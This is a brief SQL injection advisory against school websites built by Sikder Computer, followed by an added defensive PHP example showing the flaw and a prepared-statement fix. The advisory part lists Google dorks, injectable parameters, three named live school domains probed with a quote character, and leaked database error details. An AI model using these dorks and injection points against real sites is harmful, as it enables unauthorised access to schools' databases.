Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability

2019.01.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#####################################################################
# Exploit Title : Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : sikdercomputer.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks :
intext:''Design & Developed by Sikder Computer, Mathbaria'' site:edu.bd
intext:''Powered by Sikder Computer'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-sikder-computer-center-mathbaria-bd-sql-injection.html?pid=182084#pid182084
#####################################################################

# Admin/Teacher/Student Panel Login Path :
***************************************
/PATH/admin/index
/PATH/students_panel/index

# SQL Injection Exploit :
***********************
[PATH]/view_gallery_meetings?page=[SQL Injection]
[PATH]/current_success_students_info?id=[SQL Injection]
[PATH]/ex_success_students_info?id=[SQL Injection]

#####################################################################

# Example Vulnerable Sites =>
*****************************
Note : (67.23.238.179) => There are 1,107 domains hosted on this server.

[+] sbss.edu.bd/sonar/view_gallery_meetings?page=1%27
[+] nalivimss.edu.bd/nali/view_gallery_meetings?page=1%27
[+] laylamalekia.edu.bd/layla/current_success_students_info?id=16%27

#####################################################################

# SQL Database Error :
*********************
Warning: mysql_connect(): Access denied for user 'nalivims_sms'@'localhost' (using password: YES) in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 3
Warning: mysql_select_db() expects parameter 2 to be resource, boolean given in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 5
Couldn't Connect to the database
***No database found ***
Warning: mysql_query(): Access denied for user ''@'localhost' (using password: NO) in /home/nalivimssedu/public_html/nali/view_gallery_meetings.php on line 19

#####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#####################################################################
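
Added defensive example, not the vendor's code and not part of the advisory: a hypothetical PHP reconstruction of the defect class the advisory reports (a request parameter such as id or page concatenated straight into a mysql_query() string, with driver warnings echoed to the visitor) beside a hardened version that validates the parameter as an integer, binds it through a mysqli prepared statement and keeps database errors out of the response. The table and column names (success_students, name, batch) are assumptions.

```php
<?php
// Hypothetical reconstruction of the vulnerable pattern (not the vendor's code).
// The request parameter is concatenated into the SQL text, so a value such as
// 16' closes the quoted literal and the remainder is parsed as SQL (CWE-89).
function vulnerable_lookup(mysqli $db, array $get): ?array
{
    $id  = $get['id'] ?? '';
    $sql = "SELECT name, batch FROM success_students WHERE id = '" . $id . "'";
    $result = $db->query($sql);          // errors surface as warnings on the page
    return $result ? $result->fetch_assoc() : null;
}

// Hardened form: reject anything that is not a positive integer, then bind the
// value as a parameter so the database never interprets it as SQL syntax.
function safe_lookup(mysqli $db, array $get): ?array
{
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);         // malformed id: no query is issued
        return null;
    }
    $stmt = $db->prepare('SELECT name, batch FROM success_students WHERE id = ?');
    $stmt->bind_param('i', $id);         // 'i' forces integer binding
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// The advisory shows raw mysql_* warnings (DB user name, file paths) reaching
// the browser. Make driver errors exceptions, log them, and never display them.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
ini_set('display_errors', '0');
ini_set('log_errors', '1');
```

With these settings a probe like id=16%27 produces an HTTP 400 and a log entry instead of a leaked error string, which is also the event a web-server log review should look for.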